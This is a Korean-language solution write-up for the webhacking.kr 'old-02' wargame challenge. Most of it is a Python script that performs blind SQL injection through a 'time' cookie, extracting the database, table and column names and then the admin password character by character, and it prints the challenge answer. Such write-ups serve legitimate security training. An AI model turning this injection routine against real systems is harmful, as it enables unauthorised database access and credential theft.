old-02 (500)
페이지 소스를 보면 아래와 같다.
<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->https://webhacking.kr/challenge/web-02/admin.php에 접속하면 패스워드를 제출하는 폼이 존재한다.
다시 돌아와서, 쿠키를 확인해보았더니 time이라는 이름의 쿠키가 있다.
쿠키 값이 true인 경우 페이지 소스의 시각이 2070-01-01 09:00:01 가 되었고, false인 경우 2070-01-01 09:00:00 가 되었다.
여기서 본 문제가 Blind SQL Injection과 관련된 문제라고 추측할 수 있다.
파이썬으로 코드를 짜보면 아래와 같다.
import urllib.request
URL = 'https://webhacking.kr/challenge/web-02/'
TRUE_PHRASE = '2070-01-01 09:00:01'
def query(payload):
req = urllib.request.Request(URL)
req.add_header('Cookie', 'time=' + payload)
r = urllib.request.urlopen(req)
content = r.read().decode('utf-8')
return TRUE_PHRASE in content
# 6
def find_db_name_len():
db_name_len = 1
while query('LENGTH(DATABASE()) = {}'.format(db_name_len)) is False:
db_name_len += 1
print('db_name_len: {}'.format(db_name_len))
return db_name_len
# chall2
def find_db_name():
db_name_len = find_db_name_len()
db_name = ''
for pos in range(1, db_name_len + 1):
for character in range(0, 128):
if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)) is True:
db_name += chr(character)
break
print('db_name: {}'.format(db_name))
return db_name
# 13
def find_table_name_length(db_name):
table_name_len = 1
while query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)) is False:
table_name_len += 1
print('table_name_len: {}'.format(table_name_len))
return table_name_len
# admin_area_pw
def find_table_name():
db_name = find_db_name()
table_name_len = find_table_name_length(db_name)
table_name = ''
for pos in range(1, table_name_len + 1):
for character in range(0, 128):
if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)) is True:
table_name += chr(character)
break
print('table_name: {}'.format(table_name))
return table_name
# 2
def find_column_name_length(table_name):
column_name_len = 1
while query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)) is False:
column_name_len += 1
print('column_name_len: {}'.format(column_name_len))
return column_name_len
# pw
def find_column_name(table_name):
column_name_len = find_column_name_length(table_name)
column_name = ''
for pos in range(1, column_name_len + 1):
for character in range(0, 128):
if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)) is True:
column_name += chr(character)
break
print('column_name: {}'.format(column_name))
return column_name
# 17
def find_pw_length(column_name, table_name):
pw_len = 1
while query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)) is False:
pw_len += 1
print('pw_len: {}'.format(pw_len))
return pw_len
# kudos_to_beistlab
def find_pw():
table_name = find_table_name()
column_name = find_column_name(table_name)
pw_len = find_pw_length(column_name, table_name)
pw = ''
for pos in range(1, pw_len + 1):
for character in range(0, 128):
if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)) is True:
pw += chr(character)
break
print('pw: {}'.format(pw))
find_pw()코드 실행결과, pw 는 kudos_to_beistlab 임을 알 수 있다.
이 값을 https://webhacking.kr/challenge/web-02/admin.php의 폼에 넣고 제출하면 문제가 풀린다.
Last updated